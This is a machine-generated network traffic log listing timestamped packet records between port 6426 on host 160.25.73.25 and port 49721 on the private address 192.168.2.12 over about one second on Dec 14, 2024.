                                                                                                                                          Dec 14, 2024 14:00:52.171693087 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.171741009 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.175846100 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.175956964 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.176001072 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.180308104 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.180398941 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.180444956 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.184551954 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.184670925 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.184726000 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.188774109 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.189032078 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.189076900 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.193034887 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.193351030 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.193404913 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.197351933 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.197531939 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.197578907 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.201601028 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.245457888 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.282061100 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.323569059 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.347290039 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.347388983 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.347460985 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.349049091 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.349229097 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.349283934 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.351794958 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.351896048 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.351954937 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.355323076 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.355431080 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.355492115 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.358875990 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.359041929 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.359097958 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.362354040 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.362446070 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.362509966 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.365917921 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.366012096 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.366075993 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.369774103 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.369951963 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.370012045 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.373996973 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.374167919 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.374217033 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.376971006 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.377074957 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.377125978 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.380104065 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.380314112 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.380362034 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.383990049 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.384133101 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.384180069 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.387234926 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.387396097 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.387453079 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.390645027 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.390739918 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.390913963 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.394129992 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.394325972 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.394376040 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.397608042 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.397708893 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.397763014 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.401163101 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.401294947 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.401355028 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.404654026 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.404768944 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.404824018 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.408191919 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.408258915 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.408318043 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.411684990 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.411875963 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.411927938 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.415184021 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.415309906 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.415405989 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.418732882 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.418801069 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.418864012 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.422214985 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.422322989 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.422488928 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.425935984 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.426001072 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.426055908 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.429290056 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.429378986 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.429431915 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.432776928 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.432899952 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.432948112 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.436297894 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.436346054 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.436397076 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.439814091 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.439945936 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.440011024 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.443398952 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.443473101 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.443526030 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.446867943 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.447069883 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.447139978 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.450395107 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.450506926 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.450567007 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.453898907 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.453996897 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.454050064 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.457484961 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.457559109 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.457618952 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.460912943 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.461051941 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.461103916 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.464466095 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.464555025 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.464633942 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.467974901 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.468133926 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.468193054 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.471451998 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.511060953 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.604989052 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.605052948 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.605225086 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.605870962 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.605993986 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.606044054 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.607711077 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.607857943 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.607920885 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.609532118 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.609608889 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.609659910 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.611330986 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.611443043 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.611491919 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.613632917 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.613770962 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.613817930 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.615169048 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.615238905 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.615291119 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.616806030 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.616882086 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.616925955 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.618557930 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.618681908 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.618733883 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.620450020 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.620600939 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.620646954 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.622159004 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.622291088 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.622340918 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.624028921 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.624136925 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.624178886 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.625798941 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.625900984 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.625941992 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.627605915 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.627722979 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.627774000 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.629833937 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.630023003 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.630079031 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.632170916 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.632260084 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.632306099 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.633805990 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.633948088 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.633997917 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.635363102 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.635457039 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.635509014 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.636790037 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.636878967 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.636930943 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.638528109 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.638600111 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.638652086 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.640230894 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.640333891 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.640382051 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.642056942 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.642141104 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.642189026 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.643846035 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.643955946 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.644005060 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.645725965 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.645843029 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.645895958 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.647465944 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.647511959 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.647557020 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.649276018 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.649286985 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.649331093 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.651074886 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.651125908 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.651176929 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.652859926 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.652971029 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.653017998 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.654679060 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.654794931 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.654846907 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.656476974 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.656589985 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.656634092 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.658341885 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.658457994 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.658504009 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.660155058 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.660202980 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.660248995 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.661973000 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.662020922 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.662075043 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.663708925 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.663826942 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.663875103 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.665510893 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.665678024 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.665725946 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.667330027 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.667418003 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.667465925 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.669168949 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.669240952 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.669287920 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.670927048 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.671050072 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.671097040 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.672750950 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.672861099 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.672903061 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.674560070 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.674712896 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.674761057 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.676354885 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.676455975 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.676525116 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.678271055 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.678431988 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.678483009 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.679991007 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.680088997 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.680135012 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.681806087 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.681879997 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.681926966 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.683617115 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.683708906 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.683753014 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.685394049 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.685633898 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.685677052 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.687230110 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.687391996 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.687448978 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.689029932 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.689177036 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.689223051 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.797070980 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.839212894 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.861233950 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.861428976 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.861500025 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.861938953 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.862065077 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.862124920 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.863576889 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.863682985 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.863728046 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.865130901 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.865284920 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.865326881 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.866714954 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.866820097 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.866862059 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.868307114 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.868442059 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.868489027 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.869916916 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.870009899 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.870054007 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.871534109 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.871617079 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.871666908 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.873081923 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.873508930 CET642649721160.25.73.25192.168.2.12
